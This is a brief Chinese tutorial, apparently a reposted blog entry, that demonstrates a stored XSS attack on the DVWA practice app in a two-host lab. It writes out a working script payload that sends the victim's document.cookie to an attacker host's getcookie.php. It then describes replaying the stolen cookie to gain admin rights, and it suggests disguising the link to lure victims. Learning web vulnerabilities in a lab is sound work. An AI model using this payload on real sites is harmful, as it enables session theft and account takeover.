实例演示——————简单演示XSS store攻击,便于学习理解XSS store

    xiaoxiao2021-03-25  113

    此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。 一,环境搭建      1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。      2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者点开激活代码)      3,接收cookie代码准备。(此次代码放在攻击者主机192.168.98.170上) 二,实例演示XSS store

         1,如图,受害者(192.168.98.168)正在登陆DVWA

         2,攻击者再存在XSS漏洞页面留言:<script>document.write('<img src="http://192.168.98.170/getcookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script>    //为了演示,alert(/XSS/)</script>是加上去看效果的

         3,受害者浏览存在XSS漏洞页面,触发代码执行,本地cookie被盗取

         4,查看接收cookie代码getcookie.php是否生成cookie.txt文本文件,是则接收到cookie并存储于其中。

         5,攻击者利用工具,修改cookie登陆DVWA,获得受害者一样的管理员权限。

    三,总结     此次简单的演示,便于初步认识XSS store。可以发挥想象你就清楚XSS store的危害以及为何XSS会位列OWASP TOP 10.
    转载请注明原文地址: https://ju.6miu.com/read-9969.html

    最新回复(0)